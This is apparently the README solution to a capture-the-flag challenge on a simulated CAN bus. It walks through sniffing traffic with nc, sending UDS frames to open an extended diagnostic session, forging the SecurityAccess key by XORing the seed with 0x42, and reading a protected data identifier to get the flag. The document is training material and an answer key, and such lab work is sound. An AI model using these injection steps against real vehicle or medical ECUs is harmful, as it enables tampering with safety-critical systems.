| .. | ||
| README.md | ||
CAN Bus Implant — Solution
Overview
Simulated CAN bus with background traffic and UDS (Unified Diagnostic Services) protocol. Player sniffs traffic to identify patterns, then injects UDS frames to gain security access and read a protected DID.
Steps
- Open two terminals — one for sniffing, one for injection:
# Terminal 1: Sniff
nc <host> 3600
# Terminal 2: Inject
nc <host> 3601
-
Observe traffic on the sniff port. Note the following patterns:
0x100: Heartbeat (periodic counter)0x200-0x203: Sensor data (temperature, heart rate)0x7DF: OBD broadcast diagnostic request0x7E0→0x7E8: UDS request/response pair (periodic VIN read)
-
On the inject port, enter extended diagnostic session:
send 7E0 02 10 03 00 00 00 00 00
Response on sniff shows 0x7E8 with positive response 50 03.
- Request a security seed:
send 7E0 02 27 01 00 00 00 00 00
Response contains 4-byte seed: 67 01 XX XX XX XX.
- Compute the key by XORing each seed byte with
0x42, then send:
send 7E0 06 27 02 KK KK KK KK 00
Positive response: 67 02.
- Read the flag from DID 0xFF01:
send 7E0 03 22 FF 01 00 00 00 00
Response contains the flag.
Key Concepts
- CAN bus: Controller Area Network — no authentication, broadcast medium, used in vehicles and medical equipment
- UDS (ISO 14229): Diagnostic protocol with services like DiagnosticSessionControl, SecurityAccess, ReadDataByIdentifier
- SecurityAccess: Challenge-response authentication — ECU sends seed, tester must compute correct key
- Traffic analysis: Identifying request/response patterns and protocol types from raw bus traffic